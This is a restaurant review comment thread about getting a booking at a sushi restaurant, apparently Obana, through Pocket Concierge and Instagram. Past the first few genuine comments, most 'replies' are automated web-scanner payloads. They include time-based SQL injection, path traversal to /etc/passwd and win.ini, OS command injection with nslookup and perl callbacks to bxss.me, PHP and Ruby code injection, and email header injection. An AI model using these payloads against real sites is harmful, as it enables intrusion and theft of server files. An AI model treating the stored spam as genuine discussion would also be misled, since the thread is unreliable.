Haven't been there recently. But will be going in May. Am not sure whether they are accepting new customers, but if you have been there before and you let them know early, they can do something for you.
I went very recently, and it's still in my top 3. It is relatively hard to get these days though, especially since foreigners can only book 2 months in advance so most slots are taken. But it's not impossible through Pocket Concierge with enough flexibility.
Definitely worth trying for it. Also only 33k is an absolute steal for the quality and quantity you get.
@Eric, foreigners can actually book 90 days ahead of time using pocket concierge. And for foreigners that have been there before, actually they will take down your names and you are actually allowed to make it even much earlier in advance, definitely earlier than the 4 months booking window.
@Justeat You can just try your luck messaging them in ig. They are quite responsive.
Just revisited yesterday. Very easy to reserve for those who have been there before.
Ikura was one of the starting pieces of nigiri and it somehow felt less magical compared to the previous time.
As expected, uni and toro(esp senaka) still unbelievably good. Ajibozushi, nodoguro don with dashi added in halfway, kurumaebi don, akagai and anago were very good.
Price has not increased since pre-covid (30k omakase before tax), but resultingly the number of tsumami has decreased.
The flow has been somewhat slower, it took 2.5hrs for the whole meal.
Would still highly recommend this place for a fancy meal, but lower inclination to revisit due to the long distance from Tokyo.
Somehow I got a reservation at Obana 6 months in advance. I have never been before.
I made a request through Pocket Concierge. Pocket Concierge told me I needed to first contact the restaurant on Instagram directly. Then after I confirmed the reservation with the restaurant, Pocket Concierge would confirm it.
I sent a message to Obana on Instagram but they never responded.
4 days later, my reservation at Obana was confirmed by Pocket Concierge. It was very strange!
@Henry Sorry, I don't know if there's a way to receive notifications on posts I've commented on and I don't check the site often. I explained everything in my post.
I made a booking request through Pocket Concierge. Then messaged Obana on Instagram. Then Pocket Concierge came back to me with a confirmed reservation.
18 Comments
Haven't been there recently. But will be going in May. Am not sure whether they are accepting new customers, but if you have been there before and you let them know early, they can do something for you.
re: guest
LA1lHvc3
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+583-583-1=0+0+0+1
re: guest
-1 OR 3+583-583-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
HJhvuf0A'; waitfor delay '0:0:15' --
re: guest
-5 OR 268=(SELECT 268 FROM PG_SLEEP(15))--
re: guest
-5) OR 952=(SELECT 952 FROM PG_SLEEP(15))--
re: guest
-1)) OR 896=(SELECT 896 FROM PG_SLEEP(15))--
re: guest
m6dNFeuR' OR 11=(SELECT 11 FROM PG_SLEEP(15))--
re: guest
2OnlN4DC') OR 383=(SELECT 383 FROM PG_SLEEP(15))--
re: guest
noS1Kh4L')) OR 271=(SELECT 271 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@R24J9
re: guest
8L1ox5sa
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+879-879-1=0+0+0+1
re: guest
-1 OR 3+879-879-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
S51j0Ldi'; waitfor delay '0:0:15' --
re: guest
-5 OR 957=(SELECT 957 FROM PG_SLEEP(15))--
re: guest
-5) OR 795=(SELECT 795 FROM PG_SLEEP(15))--
re: guest
-1)) OR 877=(SELECT 877 FROM PG_SLEEP(15))--
re: guest
9M5acAUd' OR 295=(SELECT 295 FROM PG_SLEEP(15))--
re: guest
F8j1y0yw') OR 745=(SELECT 745 FROM PG_SLEEP(15))--
re: guest
5Qro0aPV')) OR 843=(SELECT 843 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@7Wgu1
I never been there, sadly. Hopefully, they still accept new customer.
re: Justeat
XjUYTap7
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
-1 OR 2+673-673-1=0+0+0+1
re: Justeat
-1 OR 3+673-673-1=0+0+0+1
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
0otCKp5A'; waitfor delay '0:0:15' --
re: Justeat
-5 OR 139=(SELECT 139 FROM PG_SLEEP(15))--
re: Justeat
-5) OR 976=(SELECT 976 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 926=(SELECT 926 FROM PG_SLEEP(15))--
re: Justeat
brcBiyWL' OR 119=(SELECT 119 FROM PG_SLEEP(15))--
re: Justeat
AgEIxvwU') OR 895=(SELECT 895 FROM PG_SLEEP(15))--
re: Justeat
WSm9LO7i')) OR 923=(SELECT 923 FROM PG_SLEEP(15))--
re: Justeat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@0yHFM
re: Justeat
Y7nCncNn
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
-1 OR 2+396-396-1=0+0+0+1
re: Justeat
-1 OR 3+396-396-1=0+0+0+1
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
9ELgMjMM'; waitfor delay '0:0:15' --
re: Justeat
-5 OR 762=(SELECT 762 FROM PG_SLEEP(15))--
re: Justeat
-5) OR 145=(SELECT 145 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 553=(SELECT 553 FROM PG_SLEEP(15))--
re: Justeat
HCXQut59' OR 897=(SELECT 897 FROM PG_SLEEP(15))--
re: Justeat
84NZksJo') OR 576=(SELECT 576 FROM PG_SLEEP(15))--
re: Justeat
HNWHLgVV')) OR 298=(SELECT 298 FROM PG_SLEEP(15))--
re: Justeat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@WysF3
re: Justeat
1DDDl4bCIlO
re: Justeat
response.write(9490078*9063779)
re: Justeat
'+response.write(9490078*9063779)+'
re: Justeat
"+response.write(9490078*9063779)+"
re: Justeat
%0abcc:074625.67-22185.67.8ed75.19990.2@bxss.me
re: Justeat
to@example.com>%0d%0abcc:074625.67-22186.67.8ed75.19990.2@bxss.me
re: Justeat
<esi:include src="http://bxss.me/rpb.png"/>
re: Justeat
${10000252+9999669}
re: Justeat
../../../../../../../../../../../../../../etc/passwd
re: Justeat
../../../../../../../../../../../../../../windows/win.ini
re: Justeat
file:///etc/passwd
re: Justeat
../../../../../../../../../../../../../../../proc/version
re: Justeat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Justeat
../../../../../../../../../../etc/passwd%00.jpg
re: Justeat
)
re: Justeat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Justeat
!(()&&!|*|*|
re: Justeat
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Justeat
^(#$!@#$)(()))******
re: Justeat
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Justeat
echo bjtige$()\ ctvbwe\nz^xyu||a #' &echo bjtige$()\ ctvbwe\nz^xyu||a #|" &echo bjtige$()\ ctvbwe\nz^xyu||a #
re: Justeat
/etc/passwd
re: Justeat
&echo hcercz$()\ cngytr\nz^xyu||a #' &echo hcercz$()\ cngytr\nz^xyu||a #|" &echo hcercz$()\ cngytr\nz^xyu||a #
re: Justeat
%2fetc%2fpasswd
re: Justeat
|echo mddxfk$()\ sepycf\nz^xyu||a #' |echo mddxfk$()\ sepycf\nz^xyu||a #|" |echo mddxfk$()\ sepycf\nz^xyu||a #
re: Justeat
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Justeat
(nslookup hitojpowlgbda30ecb.bxss.me||perl -e "gethostbyname('hitojpowlgbda30ecb.bxss.me')")
re: Justeat
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Justeat
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Justeat
'.gethostbyname(lc('hittf'.'fvigttgs8fc09.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(75).chr(107).chr(71).'
re: Justeat
$(nslookup hituwkztxwjtvc134d.bxss.me||perl -e "gethostbyname('hituwkztxwjtvc134d.bxss.me')")
re: Justeat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Justeat
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Justeat
".gethostbyname(lc("hitsm"."eaviafivba757.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(74).chr(116).chr(77)."
re: Justeat
&nslookup hitkoqrbhraqif01f7.bxss.me&'\"`0&nslookup hitkoqrbhraqif01f7.bxss.me&`'
re: Justeat
Http://bxss.me/t/fit.txt
re: Justeat
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Justeat
&(nslookup hittxxddduxxaace58.bxss.me||perl -e "gethostbyname('hittxxddduxxaace58.bxss.me')")&'\"`0&(nslookup hittxxddduxxaace58.bxss.me||perl -e "gethostbyname('hittxxddduxxaace58.bxss.me')")&`'
re: Justeat
http://bxss.me/t/fit.txt%3F.jpg
re: Justeat
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Justeat
|(nslookup hitbmoenhrlhp37f44.bxss.me||perl -e "gethostbyname('hitbmoenhrlhp37f44.bxss.me')")
re: Justeat
/etc/shells
re: Justeat
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Justeat
`(nslookup hitkdwdipkxkn4dcd8.bxss.me||perl -e "gethostbyname('hitkdwdipkxkn4dcd8.bxss.me')")`
re: Justeat
c:/windows/win.ini
re: Justeat
file:///etc/passwd
re: Justeat
;(nslookup hitjsruybenypd07ce.bxss.me||perl -e "gethostbyname('hitjsruybenypd07ce.bxss.me')")|(nslookup hitjsruybenypd07ce.bxss.me||perl -e "gethostbyname('hitjsruybenypd07ce.bxss.me')")&(nslookup hitjsruybenypd07ce.bxss.me||perl -e "gethostbyname('hitjsruybenypd07ce.bxss.me')")
re: Justeat
bxss.me
re: Justeat
/\../\../\../\../\../\../\../etc/passwd
re: Justeat
/WEB-INF/web.xml
re: Justeat
C:\WINDOWS\system32\drivers\etc\hosts
re: Justeat
HttP://bxss.me/t/xss.html?%00
re: Justeat
../../../../../../../../../../windows/win.ini%00.jpg
re: Justeat
bxss.me/t/xss.html?%00
re: Justeat
/../../../../../../../../../../boot.ini
re: Justeat
"+"A".concat(70-3).concat(22*4).concat(105).concat(72).concat(108).concat(71)+(require"socket"
Socket.gethostbyname("hitqr"+"wbiwpokc0c644.bxss.me.")[3].to_s)+"
re: Justeat
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Justeat
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Justeat
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Justeat
'+'A'.concat(70-3).concat(22*4).concat(100).concat(87).concat(116).concat(85)+(require'socket'
Socket.gethostbyname('hitpv'+'simtsbyg090e2.bxss.me.')[3].to_s)+'
re: Justeat
';print(md5(31337));$a='
re: Justeat
..\..\..\..\..\..\..\..\windows\win.ini
re: Justeat
";print(md5(31337));$a="
re: Justeat
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Justeat
${@print(md5(31337))}
re: Justeat
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Justeat
'"
re: Justeat
${@print(md5(31337))}\
re: Justeat
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Justeat
<!--
re: Justeat
'.print(md5(31337)).'
re: Justeat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Justeat
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Justeat
WEB-INF/web.xml
re: Justeat
WEB-INF\web.xml
re: Justeat
1
re: Justeat
1
re: Justeat
-1 OR 2+617-617-1=0+0+0+1 --
re: Justeat
-1 OR 3+617-617-1=0+0+0+1 --
re: Justeat
-1 OR 2+728-728-1=0+0+0+1
re: Justeat
-1 OR 3+728-728-1=0+0+0+1
re: Justeat
-1' OR 2+212-212-1=0+0+0+1 --
re: Justeat
-1' OR 3+212-212-1=0+0+0+1 --
re: Justeat
-1' OR 2+236-236-1=0+0+0+1 or 'bUrnpJss'='
re: Justeat
-1' OR 3+236-236-1=0+0+0+1 or 'bUrnpJss'='
re: Justeat
-1" OR 2+287-287-1=0+0+0+1 --
re: Justeat
-1" OR 3+287-287-1=0+0+0+1 --
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
jQHuvoOU'; waitfor delay '0:0:15' --
re: Justeat
-5 OR 483=(SELECT 483 FROM PG_SLEEP(15))--
re: Justeat
-5) OR 744=(SELECT 744 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 291=(SELECT 291 FROM PG_SLEEP(15))--
re: Justeat
Ggrr6HCk' OR 309=(SELECT 309 FROM PG_SLEEP(15))--
re: Justeat
rX0iombE') OR 814=(SELECT 814 FROM PG_SLEEP(15))--
re: Justeat
s6RHfI1d')) OR 23=(SELECT 23 FROM PG_SLEEP(15))--
re: Justeat
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@RO4b9
They accept reservations 4 months in advance at the beginning of each month. Phone calls are not easy to get through.
re: Leo Saito
NULmVMAl
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+258-258-1=0+0+0+1
re: Leo Saito
-1 OR 3+258-258-1=0+0+0+1
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
kfbovFhn'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 531=(SELECT 531 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 172=(SELECT 172 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 450=(SELECT 450 FROM PG_SLEEP(15))--
re: Leo Saito
U8SomoQp' OR 377=(SELECT 377 FROM PG_SLEEP(15))--
re: Leo Saito
hhHddFyl') OR 47=(SELECT 47 FROM PG_SLEEP(15))--
re: Leo Saito
MSS1Rrcx')) OR 783=(SELECT 783 FROM PG_SLEEP(15))--
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@5Pk5c
re: Leo Saito
adr9bluu
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+356-356-1=0+0+0+1
re: Leo Saito
-1 OR 3+356-356-1=0+0+0+1
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
h46TolRv'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 322=(SELECT 322 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 85=(SELECT 85 FROM PG_SLEEP(15))--
re: Leo Saito
